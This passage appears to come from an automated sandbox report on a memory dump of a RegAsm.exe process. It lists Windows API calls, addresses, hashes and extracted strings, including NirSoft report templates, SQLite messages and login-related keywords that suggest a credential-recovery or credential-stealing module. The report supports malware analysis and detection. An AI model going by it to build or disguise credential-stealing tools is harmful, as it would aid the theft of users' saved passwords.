                                                          • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                          • String ID:
                                                          • API String ID: 1700100422-0
                                                          • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                          • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                          • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                          • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                          APIs
                                                          • GetClientRect.USER32(?,?), ref: 004111E0
                                                          • GetWindowRect.USER32(?,?), ref: 004111F6
                                                          • GetWindowRect.USER32(?,?), ref: 0041120C
                                                          • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                          • GetWindowRect.USER32(00000000), ref: 0041124D
                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                          • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                          • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                          • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                          • String ID:
                                                          • API String ID: 552707033-0
                                                          • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                          • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                          • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                          • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$_snwprintf
                                                          • String ID: %%0.%df
                                                          • API String ID: 3473751417-763548558
                                                          • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                          • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                          • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                          • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                          APIs
                                                          • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                          • KillTimer.USER32(?,00000041), ref: 004060D7
                                                          • KillTimer.USER32(?,00000041), ref: 004060E8
                                                          • GetTickCount.KERNEL32 ref: 0040610B
                                                          • GetParent.USER32(?), ref: 00406136
                                                          • SendMessageW.USER32(00000000), ref: 0040613D
                                                          • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                          • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                          • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                          • String ID: A
                                                          • API String ID: 2892645895-3554254475
                                                          APIs
                                                          • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                            • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                            • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                            • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                            • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                          • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                          • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                          • GetDesktopWindow.USER32 ref: 0040D9FD
                                                          • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                          • memset.MSVCRT ref: 0040DA23
                                                          • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                          • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                          • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                            • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                          • String ID: caption
                                                          • API String ID: 973020956-4135340389
                                                          APIs
                                                          Strings
                                                          • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$_snwprintf$wcscpy
                                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                          • API String ID: 1283228442-2366825230
                                                          APIs
                                                          • wcschr.MSVCRT ref: 00413972
                                                          • wcscpy.MSVCRT ref: 00413982
                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                          • wcscpy.MSVCRT ref: 004139D1
                                                          • wcscat.MSVCRT ref: 004139DC
                                                          • memset.MSVCRT ref: 004139B8
                                                            • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                            • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                          • memset.MSVCRT ref: 00413A00
                                                          • memcpy.MSVCRT ref: 00413A1B
                                                          • wcscat.MSVCRT ref: 00413A27
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                          • String ID: \systemroot
                                                          • API String ID: 4173585201-1821301763
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: wcscpy
                                                          • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                          • API String ID: 1284135714-318151290
                                                          APIs
                                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                            • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                            • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                          • memcpy.MSVCRT ref: 0040C11B
                                                          • strchr.MSVCRT ref: 0040C140
                                                          • strchr.MSVCRT ref: 0040C151
                                                          • _strlwr.MSVCRT ref: 0040C15F
                                                          • memset.MSVCRT ref: 0040C17A
                                                          • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                          • String ID: 4$h
                                                          • API String ID: 4019544885-1856150674
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                          • String ID: 0$6
                                                          • API String ID: 4066108131-3849865405
                                                          APIs
                                                          • memset.MSVCRT ref: 004082EF
                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                          • memset.MSVCRT ref: 00408362
                                                          • memset.MSVCRT ref: 00408377
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$ByteCharMultiWide
                                                          • String ID:
                                                          • API String ID: 290601579-0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@$wcslen
                                                          • String ID:
                                                          • API String ID: 239872665-3916222277
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpywcslen$_snwprintfmemset
                                                          • String ID: %s (%s)$YV@
                                                          • API String ID: 3979103747-598926743
                                                          APIs
                                                          • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                          • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Library$AddressFreeLoadMessageProc
                                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                          • API String ID: 2780580303-317687271
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                          • wcslen.MSVCRT ref: 0040A6B1
                                                          • wcscpy.MSVCRT ref: 0040A6C1
                                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                          • wcscpy.MSVCRT ref: 0040A6DB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                          • String ID: Unknown Error$netmsg.dll
                                                          • API String ID: 2767993716-572158859
                                                          APIs
                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                          • wcscpy.MSVCRT ref: 0040DAFB
                                                          • wcscpy.MSVCRT ref: 0040DB0B
                                                          • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                            • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfilewcscpy$AttributesFileString
                                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                          • API String ID: 3176057301-2039793938
                                                          APIs
                                                          Strings
                                                          • database %s is already in use, xrefs: 0042F6C5
                                                          • database is already attached, xrefs: 0042F721
                                                          • cannot ATTACH database within transaction, xrefs: 0042F663
                                                          • unable to open database: %s, xrefs: 0042F84E
                                                          • too many attached databases - max %d, xrefs: 0042F64D
                                                          • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                          • out of memory, xrefs: 0042F865
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpymemset
                                                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                          • API String ID: 1297977491-2001300268
                                                          APIs
                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                          • memcpy.MSVCRT ref: 0040EB80
                                                          • memcpy.MSVCRT ref: 0040EB94
                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                          • String ID: ($d
                                                          • API String ID: 1140211610-1915259565
                                                          APIs
                                                          • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                          • Sleep.KERNEL32(00000001), ref: 004178E9
                                                          • GetLastError.KERNEL32 ref: 004178FB
                                                          • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$ErrorLastLockSleepUnlock
                                                          • String ID:
                                                          • API String ID: 3015003838-0
                                                          APIs
                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                          • memset.MSVCRT ref: 00413ADC
                                                          • memset.MSVCRT ref: 00413AEC
                                                            • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                          • memset.MSVCRT ref: 00413BD7
                                                          • wcscpy.MSVCRT ref: 00413BF8
                                                          • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                          • String ID: 3A
                                                          • API String ID: 3300951397-293699754
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                          • wcscpy.MSVCRT ref: 0040D1B5
                                                            • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                            • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                          • wcslen.MSVCRT ref: 0040D1D3
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                          • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                          • memcpy.MSVCRT ref: 0040D24C
                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                          • String ID: strings
                                                          • API String ID: 3166385802-3030018805
                                                          APIs
                                                          • memset.MSVCRT ref: 00411AF6
                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                          • wcsrchr.MSVCRT ref: 00411B14
                                                          • wcscat.MSVCRT ref: 00411B2E
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FileModuleNamememsetwcscatwcsrchr
                                                          • String ID: AE$.cfg$General$EA
                                                          • API String ID: 776488737-1622828088
                                                          APIs
                                                          • memset.MSVCRT ref: 0040D8BD
                                                          • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                          • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                          • memset.MSVCRT ref: 0040D906
                                                          • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                          • _wcsicmp.MSVCRT ref: 0040D92F
                                                            • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                            • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                          • String ID: sysdatetimepick32
                                                          • API String ID: 1028950076-4169760276
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy$memset
                                                          • String ID: -journal$-wal
                                                          • API String ID: 438689982-2894717839
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                          • EndDialog.USER32(?,00000002), ref: 00405C83
                                                          • EndDialog.USER32(?,00000001), ref: 00405C98
                                                            • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                            • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                          • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                          • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Item$Dialog$MessageSend
                                                          • String ID:
                                                          • API String ID: 3975816621-0
                                                          APIs
                                                          • _wcsicmp.MSVCRT ref: 00444D09
                                                          • _wcsicmp.MSVCRT ref: 00444D1E
                                                          • _wcsicmp.MSVCRT ref: 00444D33
                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _wcsicmp$wcslen$_memicmp
                                                          • String ID: .save$http://$https://$log profile$signIn
                                                          • API String ID: 1214746602-2708368587
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                          • String ID:
                                                          • API String ID: 4218492932-0
                                                          APIs
                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                          • memcpy.MSVCRT ref: 0044A8BF
                                                          • memcpy.MSVCRT ref: 0044A90C
                                                          • memcpy.MSVCRT ref: 0044A988
                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                          • memcpy.MSVCRT ref: 0044A9D8
                                                          • memcpy.MSVCRT ref: 0044AA19
                                                          • memcpy.MSVCRT ref: 0044AA4A
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy$memset
                                                          • String ID: gj
                                                          • API String ID: 438689982-4203073231
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy
                                                          • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                          • API String ID: 3510742995-2446657581
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                          • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                          • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                          • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                          • memset.MSVCRT ref: 00405ABB
                                                          • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                          • SetFocus.USER32(?), ref: 00405B76
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$FocusItemmemset
                                                          • String ID:
                                                          • API String ID: 4281309102-0
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _snwprintfwcscat
                                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                          • API String ID: 384018552-4153097237
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$CountInfomemsetwcschr
                                                          • String ID: 0$6
                                                          • API String ID: 2029023288-3849865405
                                                          APIs
                                                            • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                          • memset.MSVCRT ref: 00405455
                                                          • memset.MSVCRT ref: 0040546C
                                                          • memset.MSVCRT ref: 00405483
                                                          • memcpy.MSVCRT ref: 00405498
                                                          • memcpy.MSVCRT ref: 004054AD
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$memcpy$ErrorLast
                                                          • String ID: 6$\
